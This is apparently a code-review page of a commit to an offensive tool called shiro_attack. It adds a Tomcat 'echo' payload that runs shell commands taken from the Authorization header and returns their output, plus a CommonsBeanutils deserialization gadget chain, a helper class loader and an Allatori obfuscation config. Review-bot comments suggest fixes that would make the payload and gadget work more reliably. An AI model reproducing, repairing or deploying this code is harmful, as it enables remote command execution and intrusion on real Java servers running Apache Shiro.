Showing
17 changed files
with
537 additions
and
4 deletions.
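--- a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
+++ b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
@@ -0,0 +1,128 @@
+package com.summersec.attack.deser.echo;
+
+import javassist.*;
+
+import java.io.IOException;
+
+/**
+* @ClassName: TomcatEcho2
+* @Description: TODO
+* @Author: Summer
+* @Date: 2022/1/19 11:33
+* @Version: v1.0.0
+* @Description:
+**/
+public class TomcatEcho2 implements EchoPayload{
+@Override
+public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException {
+final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
+if (clazz.getDeclaredConstructors().length != 0) {
+clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
+}
+
+
+
+clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" +
+" byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" +
+" Object var2;\n" +
+" Class var3;\n" +
+" try {\n" +
+" var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
+" var2 = var3.newInstance();\n" +
+" var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" +
+" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
+" } catch (Exception var5) {\n" +
+" var3 = Class.forName(\"java.nio.ByteBuffer\");\n" +
+" var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" +
+" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
+" } \n" +
+" }",clazz));
+
+clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" +
+" java.lang.reflect.Field var2 = null;\n" +
+" Class var3 = var0.getClass();\n" +
+"\n" +
+" while(var3 != Object.class) {\n" +
+" try {\n" +
+" var2 = var3.getDeclaredField(var1);\n" +
+" break;\n" +
+" } catch (NoSuchFieldException var5) {\n" +
+" var3 = var3.getSuperclass();\n" +
+" }\n" +
+" }\n" +
+"\n" +
+" if (var2 == null) {\n" +
+" throw new NoSuchFieldException(var1);\n" +
+" } else {\n" +
+" var2.setAccessible(true);\n" +
+" return var2.get(var0);\n" +
+" }\n" +
+" }", clazz));
+clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" +
+" boolean var4 = false;\n" +
+" Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" +
+" for (int var6 = 0; var6 < var5.length; ++var6) {\n" +
+" Thread var7 = var5[var6];\n" +
+" if (var7 != null) {\n" +
+" String var3 = var7.getName();\n" +
+" if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" +
+" Object var1 = getFV(var7, \"target\");\n" +
+" if (var1 instanceof Runnable) {\n" +
+" try {\n" +
+" var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" +
+" } catch (Exception var13) {\n" +
+" continue;\n" +
+" }\n" +
+" java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" +
+"\n" +
+" for(int var10 = 0; var10 < var9.size(); ++var10) {\n" +
+" Object var11 = var9.get(var10);\n" +
+" var1 = getFV(var11, \"req\");\n" +
+" Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" +
+" try {\n" +
+"\n" +
+"\n" +
+" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" +
+" if (var3 != null && !var3.isEmpty()) {\n" +
+" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
+" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
+" var4 = true;\n" +
+" }\n" +
+"\n" +
+" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" +
+" if (var3 != null && !var3.isEmpty()) {\n" +
+" var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" +
+" String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" +
+" writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" +
+" var4 = true;\n" +
+" }\n" +
+"\n" +
+" if (var4) {\n" +
+" break;\n" +
+" }\n" +
+" }catch (Exception var14) {\n" +
+" writeBody(var2, var14.getMessage().getBytes());\n" +
+" }\n" +
+" }\n" +
+"\n" +
+" if (var4) {\n" +
+" break;\n" +
+" }\n" +
+" }\n" +
+" }\n" +
+" }\n" +
+" }\n" +
+" }",clazz));
+
+return clazz;
+}
+
+
+public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException {
+ClassPool pool = ClassPool.getDefault();
+// TomcatEcho2 tomcatEcho2 = new TomcatEcho2();
+SpringEcho springEcho = new SpringEcho();
+springEcho.genPayload(pool);
+// tomcatEcho2.genPayload(pool);
+}
+}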
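Review bot: The error path `writeBody(var2, var14.getMessage().getBytes())` in the generated constructor's catch block dereferences `getMessage()`, which is null for many exceptions (a NullPointerException from one of the `getFV` lookups, for example), so the handler that is supposed to echo the failure throws out of the constructor instead. Guard it: `String msg = var14.getMessage(); writeBody(var2, (msg == null ? var14.toString() : msg).getBytes());`. The command branch also reads only stdout through a `Scanner` that is never closed and never waits for the child process, so stderr is dropped and a command that prints nothing raises NoSuchElementException from `next()` into that same catch; `new ProcessBuilder(var12).redirectErrorStream(true)` would at least surface the error output. Separately, `main` only exercises `SpringEcho` while the `TomcatEcho2` lines are commented out, so nothing in the commit actually runs this class's Javassist source through the compiler.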
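--- a/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java
+++ b/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java
@@ -0,0 +1,57 @@
+package com.summersec.attack.deser.payloads;
+
+import com.summersec.attack.deser.payloads.annotation.Authors;
+import com.summersec.attack.deser.payloads.annotation.Dependencies;
+import com.summersec.attack.deser.util.JavassistClassLoader;
+import com.summersec.attack.deser.util.Reflections;
+import java.util.Comparator;
+import java.util.PriorityQueue;
+import java.util.Queue;
+
+import com.summersec.attack.deser.util.StandardExecutorClassLoader;
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtField;
+
+
+@Dependencies({"commons-beanutils:commons-beanutils:1.6.1"})
+@Authors({"phith0n"})
+public class CommonsBeanutilsString_192s implements ObjectPayload<Queue<Object>> {
+@Override
+public Queue<Object> getObject(Object template) throws Exception {
+
+ClassPool pool = ClassPool.getDefault();
+pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
+final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");
+
+try {
+CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID");
+beanComparator.removeField(ctSUID);
+}catch (javassist.NotFoundException e){}
+beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator));
+// mock method name until armed
+final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance();
+beanComparator.defrost();
+
+PriorityQueue<String> queue = new PriorityQueue(2, (Comparator<?>)comparator);
+
+queue.add("1");
+queue.add("1");
+
+Reflections.setFieldValue(queue, "queue", new Object[] { template, template });
+
+Reflections.setFieldValue(beanComparator, "property", "outputProperties");
+
+return (Queue)queue;
+}
+
+public static void main(String[] args) throws Exception {
+CommonsBeanutilsString_192s commonsBeanutilsString192 = new CommonsBeanutilsString_192s();
+commonsBeanutilsString192.getObject(new Object());
+
+}
+}
+
+
+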
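Review bot: `Reflections.setFieldValue(beanComparator, "property", "outputProperties")` is invoked on the `CtClass` handle, not on the `comparator` instance that was placed into the `PriorityQueue`, so the `property` field of the actual `BeanComparator` object is never armed; depending on how `Reflections.setFieldValue` handles a missing field this either fails outright or leaves the gadget pointing at the comparator's default property. The receiver should be the instance: `Reflections.setFieldValue(comparator, "property", "outputProperties");`. The empty `catch (javassist.NotFoundException e){}` is a legitimate "field may already be absent" case, but it reads as a swallowed error; naming the variable `ignored` and adding `// no declared serialVersionUID on this beanutils version; we add our own below` would make that explicit. The comment `// mock method name until armed` appears to be carried over from the ysoserial original and no longer describes the `toClass` line under it, and `StandardExecutorClassLoader` is imported but unused. Also note that `@Dependencies` declares commons-beanutils 1.6.1 while the class name and the forced serialVersionUID suggest a different target version — worth confirming they agree.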
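--- a/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java
+++ b/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java
@@ -0,0 +1,15 @@
+package com.summersec.attack.deser.util;
+
+/**
+* @ClassName: JavassistClassLoader
+* @Description: TODO
+* @Author: Summer
+* @Date: 2022/1/24 16:34
+* @Version: v1.0.0
+* @Description:
+**/
+public class JavassistClassLoader extends ClassLoader {
+public JavassistClassLoader(){
+super(Thread.currentThread().getContextClassLoader());
+}
+}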
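Review bot: The class header still reads `@Description: TODO`, and nothing in the file says why an otherwise empty `ClassLoader` subclass exists. A one-line Javadoc would save the next reader a search: `/** Empty loader parented to the thread-context class loader; presumably used as a separate defining loader so Javassist can define a patched copy of a class the parent has already loaded — confirm against callers. */`. Because it overrides nothing, every lookup delegates parent-first to the context loader; stating that explicitly avoids anyone expecting it to isolate classes.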
@@ -0,0 +1,34 @@ | ||
<!--allatori配置文件--> | ||
<config> | ||
<!-- <!\-\- 输入和输出jar配置,out指向的是加密后的jar –>--> | ||
<input> | ||
<!-- <jar in="shiro_attack-4.3-SNAPSHOT.jar" out="obf-shiro_attack-4.3-SNAPSHOT.jar"/>--> | ||
<jar in="shiro_attack-4.4-SNAPSHOT-all.jar" out="obf-shiro_attack-4.4-SNAPSHOT-all.jar"/> | ||
</input> | ||
<!-- <!\-\- 加水印 –>--> | ||
<watermark key="shiro_attack" value="developer: SummerSec"/> | ||
<!-- <!\-\- 需要保留原来类名的配置 –>--> | ||
<keep-names> | ||
<class access="protected+"> | ||
<field access="protected+"/> | ||
<method access="protected+"/> | ||
</class> | ||
<class template="class com.xxx.xxx.*"/> | ||
|
||
</keep-names> | ||
|
||
<property name="log-file" value="log.xml"/> | ||
<ignore-classes> | ||
<class template="class \*springframework\*"/> | ||
<class template="class \*shardingjdbc\*"/> | ||
<class template="class \*jni\*"/> | ||
<class template="class \*alibaba\*"/> | ||
<class template="class \*persistence\*"/> | ||
<class template="class \*apache\*"/> | ||
<class template="class \*mybatis\*"/> | ||
<!-- <!\-\- 排除包下的类,可单个到具体,注意此处一定要排除掉springboot项目的启动类 –>--> | ||
<class template="class com.apache.*"/> | ||
<class template="class org.apache.http.entity.StringEntity"/> | ||
<class template="class org.apache.cxf.*"/> | ||
</ignore-classes> | ||
</config> |
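Review bot: The `keep-names` entry `<class template="class com.xxx.xxx.*"/>` looks like a placeholder left over from a template rather than a package in this project; either point it at the real package whose names must survive obfuscation (any payload or echo class that is looked up by name through reflection, for instance) or drop it. The `ignore-classes` list (`shardingjdbc`, `mybatis`, `alibaba`, `persistence`) and the comment about excluding the Spring Boot starter class also read as copied from a generic template, so I'd trim them to what this jar actually bundles and say so in the comment. The file header for this section is not visible on this page, so its path could not be checked here.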